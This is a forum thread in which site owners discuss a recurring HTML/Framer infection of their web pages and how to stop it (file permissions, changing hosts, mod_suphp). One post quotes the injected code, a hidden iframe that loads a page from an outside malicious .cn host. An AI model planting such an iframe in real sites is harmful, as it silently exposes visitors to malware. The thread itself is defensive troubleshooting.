This also has happened to me on 3 of my regular websites. If I re-upload the webpage it works fine, then after a few hours it gets this virus and shifts the whole webpage down about 2 inches.
Then the site will not even open for anyone using AVG virus protection. It claims that the site is infected with the: HTML/Framer virus
Here is the infected script: <body bgcolor=”#ffffff”><iframe src=”http://bigtoprocks.cn:8080/index.php” width=196 height=168 style=”visibility: hidden”></iframe>
Does anyone know how to get rid of this virus?
I had this problem. I CHMOd index.php to 444, and since no one can write on the file now, no more virus attack.
Hope this helps.
Complain to your webhost. 90% of the time when you see an attack like this, it has to do with poor shared server security. If the server is shared among websites, and those websites are not properly isolated, then anybody getting into the server through any of those sites can put a program on there that scans for index.php files and inserts their malicious iframe code.
This is not necessarily a WordPress vulnerability, it’s just that that server itself is compromised. Anything you put on there will get hacked. To see this, try it yourself. Take some other text file, rename it to index.php and put in on your web server in the same way. Wait a couple hours, see if it gets “hacked” too.
Solutions:
1) Have your web host fix it (unlikely to succeed).
2) Demand your money back (if any) and get a new web host (highly recommended).
Note to any webhost who happens to read this: On shared servers, you *need* to run mod_suphp. You want the php code running with the privileges of the user who owns the files. This means that if a site gets hacked, the hacker only gets access to that users account, not to every account with web accessible files.
